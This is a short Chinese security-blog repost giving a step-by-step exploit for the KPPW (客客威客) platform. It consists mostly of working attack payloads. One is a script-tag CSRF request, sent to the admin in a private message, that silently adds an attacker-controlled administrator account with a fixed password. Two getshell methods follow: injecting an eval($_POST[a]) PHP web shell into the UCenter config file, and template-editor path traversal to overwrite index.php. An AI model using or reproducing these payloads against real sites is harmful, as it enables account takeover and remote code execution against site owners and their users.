客客威客系统CSRF+getshell漏洞利用方法

没穿底裤

714
文章

0
评论

2020年1月1日02:10:54评论528 views字数 537阅读1分47秒阅读模式

摘要

1.注册会员

2. http://127.0.0.1/index.php?do=user&view=message&msg_type=write

3，发送给admin，下面是csrf，目的是加一个管理员，账户kppw 密码kppwkppw

<script src=http://127.0.0.1/control/admin/index.php?do=user&view=add&edituid=&fds%5Busername%5D=kppw&fds%5Bpassword %5D=kppwkppw&fds%5Bemail%5D=kppw%40kppw.com&fds%5Bgroup_id%5D=1&is_submit=1 ></script>

4，getshell方法有两个

(1)gpc off 全局配置会员整合 UCENTER 编码修改为’);eval($_POST[a])?>;

连接http://127.0.0.1/config/config_ucenter.php

（2） http://127.0.0.1/control/admin/index.php?do=tpl&view=edit_tpl&tplname=default&tname=../../index.php

作者：take

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由没穿底裤发表于 2020年1月1日02:10:54
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
客客威客系统CSRF+getshell漏洞利用方法http://cn-sec.com/archives/75159.html

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码

客客威客系统CSRF+getshell漏洞利用方法

微擎普通用户权限SQL注入漏洞

无需登录-悟空CRM 存储型XSS

cacti 0.8.8g cdef.php selected_items 存在sql注入

ZwelL通用图片上传漏洞

discuz某插件设计缺陷可前台getshell

Seacmsv6.25 two sql inject

深信服数据中心2.0某处存在命令执行漏洞

Z-blog前台无需登录包含漏洞一枚

发表评论

在线咨询

微信